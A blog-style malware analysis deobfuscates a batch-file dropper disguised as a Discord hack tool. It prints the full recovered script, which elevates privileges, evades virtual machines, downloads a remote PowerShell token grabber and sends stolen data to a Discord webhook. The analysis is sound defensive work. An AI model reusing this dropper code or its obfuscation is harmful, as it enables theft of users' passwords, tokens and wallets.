Deep dive into an obfuscated bat file #

You can download the sample here

Context #

A while ago, I decided searching "discord hacks" on YouTube to find some malware that I could study. And I wasn't disappointed. I found a GitHub repository under a video giving a free discord hack tool, wow !

So after reversing the malware (it was an info stealer coded in python, you can find the sample here), I reported it to GitHub. After a while, I noticed that there was an updated release with a different kind of malware ! After some reversing and reporting, I decided to document my research.

PS: GitHub won't ban the user, so if anyone reads this, can you report it ? Link to the repo

Fun fact, as I am writing this article, a new malware has been uploaded to the repository.

UTF-16 LE, or is it ? #

When opening the bat file for the first time, you see, well... something ?

It seems that there's a problem with the encoding. By reopening the file with the encoding Western (Windows 1252), we can see something that makes "more" sense.

I can see the cls command on the first line, that's a start !

So now that we fixed the encoding issue, we can clean the code to make it a little more readable.

Cleaning #

By browsing through the code, we can find very long lines with a lot of whatever is that : ็็็็à. At first, I thought that the encoding was still wrong, but when I looked at the start of those weird lines, I saw this : ::

In a bat file, :: comments the entire line. Knowing that, we can remove a lot of lines !

We can also remove all the , and ; at the start of the lines, these are useless in the program and their whole purpose is obfuscation.

Also, let's delete %‮%, which are empty variables.

After (a lot) of cleaning, we have a clearer file:

Now, let's jump to the real de-obfuscation part !

Environment variables, they are EVERYWHERE ! #

%coMMONproGRAmfileS(x86):~28,1%, the F*CK is that ?

Well, after some research, this weird string actually makes sense : You can read it like this :

Take 1 character at index 28 of the environment variable CommonProgrammFiles(x86).

These environment variables are the same (if not tampered with), in every Windows computer. So that's the way this program is obfuscated, pretty clever, right ? Let's echo the 6 first lines on our cmd :

It works !

So now, let's follow all the goto and rewrite the code.

I noticed during the re-writing that a lot of empty variables were used, so I decided to delete them all. That was a mistake.

At some part of the code, variables are actually initialized !

For a better view of this, let's clear the actual empty variables.

To continue the re-writing, we have to also initialize these variables in our terminal !

After a LOT of echo, I stumbled on some funny comments inside the code :

As I expected, this malware was obfuscated using a third-party program, that you can find here.

Interestingly enough, I found this string in the code : $EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$ which is a reference to a standardized test file used to check the effectiveness of antivirus software. After browsing the somaliobfuscator code, the string was there not so the obfuscated file would be detected by antivirus, but because its creator was confident enough to put it here, to show that its obfuscator was completely flawless.

(spoiler, it's not)

Now that we have readable code, let's remove all goto, and go to (get it ?) the essentials of the malware.

A standard info-stealer #

Oh I was disappointed. All this, just so this file to drop an info stealer (written by the same guy that wrote the somaliobfuscator) and launch it.

Here is the full code after deobfuscation and cleaning :

 1&cls
 2@echo off
 3
 4echo @echo off > kdotQLWEBA.bat && echo findstr /i "echo" "%~f0" >> kdotQLWEBA.bat && echo if %1% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) ^2^>^n^u^l ^& del "%%~f0" ) >> kdotQLWEBA.bat && call kdotQLWEBA.bat
 5
 6powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "Start-Process -Verb RunAs -FilePath '%~f0'" & exit /b 0
 7
 8cd / %~dp0
 9
10powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/KDot227/Powershell-Token-Grabber/main/main.ps1' -UseBasicParsing; $t -replace 'https://discord.com/api/webhooks/1109064750232502322/YR75OFzI27mfrHFiih5q8BbvvgkdwJ83pukKZ9kbpI21qsJRN8NwENqXSRKLhSccWhj9', 'https://discord.com/api/webhooks/1109064750232502322/YR75OFzI27mfrHFiih5q8BbvvgkdwJ83pukKZ9kbpI21qsJRN8NwENqXSRKLhSccWhj92'| Out-File -FilePath 'powershell123.ps1' -Encoding ASCII"
11
12powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
13
14powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('%~f0') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE) -or ($bytes[2] -ne 0x26)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }"
15
16powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$VM=Get-WmiObject -Class Win32_ComputerSystem ; if ($VM.Model -match 'Virtual') { Write-Host 'Virtual Machine Detected. Exiting script.' ; taskkill /F /IM cmd.exe }"
17
18powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file powershell123.ps1
19
20timeout 3 > nul

Yep, nothing fascinating. Even the VM check at line 16 was written inside the obfuscator.

So, what does it do ? #

This sample is hence an info stealer, that drops a Powershell-Token-Grabber and send information to a discord webhook.

According to the repository, this stealer sends :

• System Information
• Passwords
• Sessions token
• Crypto wallets
• Browser Data
• List of Apps

What I find terrifying is that VirusTotal only shows a score of 2/59 detections, and that is LOW. So be careful to what you launch on your system !

Afterwords #

Even in my disappointment, I found this analysis very fun, and learned a lot !

After going back to the malware repository, I found an interesting issue :

Someone's angry 🫣

That was my first blog issue, I hope you found this interesting, and I'll come back with another one soon, I hope, maybe analyzing a new sample from the same repository 👀

Until then, see you !

IOCs #